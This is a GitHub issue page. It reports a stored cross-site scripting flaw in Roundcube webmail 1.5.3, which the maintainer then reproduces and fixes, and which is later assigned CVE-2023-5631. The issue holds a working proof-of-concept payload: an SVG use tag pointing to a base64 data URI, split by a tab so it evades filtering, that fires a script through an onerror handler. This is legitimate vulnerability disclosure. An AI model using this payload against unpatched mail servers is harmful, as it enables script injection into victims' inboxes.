Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

XSS with svg use tag on RC 1.5.3 #9168

Closed
progsmile opened this issue Oct 13, 2023 · 5 comments
Closed

XSS with svg use tag on RC 1.5.3 #9168

progsmile opened this issue Oct 13, 2023 · 5 comments

Comments

@progsmile
Copy link
Contributor

progsmile commented Oct 13, 2023

Hello dear developers!
Next sample shows me XSS. Would be pleased if you could check it on latest Roundcube version.

Reproduce:

  1. Send html to your mailbox with following content
    <svg><use href="dAta:image/s	vg+xml;base64,PHN2ZyBpZD0ieDIiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyI+IDxpbWFnZSBocmVmPSJ4IiBvbmVycm9yPSJhbGVydCgyMzQpIiAvPjwvc3ZnPg==#x2">

This is encoded string to base64 that you see above:

<svg id="x2" xmlns="http://www.w3.org/2000/svg"> <image href="x" onerror="alert(234)" /></svg>
  1. Ensure browser alerts with "234"

Env

RoundCube version: 1.5.3
Browsers: Google Chrome (Version 117.0.5938.62), Mozila Firefox (117.0.1 (64-bit))

Thanks!

@progsmile progsmile changed the title XSS with svg use tag XSS with svg use tag on RC 1.5.3 Oct 13, 2023
@alecpl alecpl added this to the 1.6.4 milestone Oct 14, 2023
@alecpl
Copy link
Member

alecpl commented Oct 14, 2023

I'm unable to reproduce the issue in Firefox nor Chrome. The href attribute is indeed passed as-is to the browser, but it does not execute the javascript code.

Tested with 1.5.4, but I don't see anything related in the changelog since 1.5.3. So, maybe I'm doing something wrong. Could you provide a complete test message?

@alecpl
Copy link
Member

alecpl commented Oct 14, 2023

Ok, I was able to reproduce now.

@alecpl
Copy link
Member

alecpl commented Oct 14, 2023

Fixed.

@alecpl alecpl closed this as completed Oct 14, 2023
@progsmile
Copy link
Contributor Author

@alecpl Thanks!

@carnil
Copy link

carnil commented Oct 19, 2023

This issue got CVE-2023-5631 assigned.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Projects
None yet
Development

No branches or pull requests

3 participants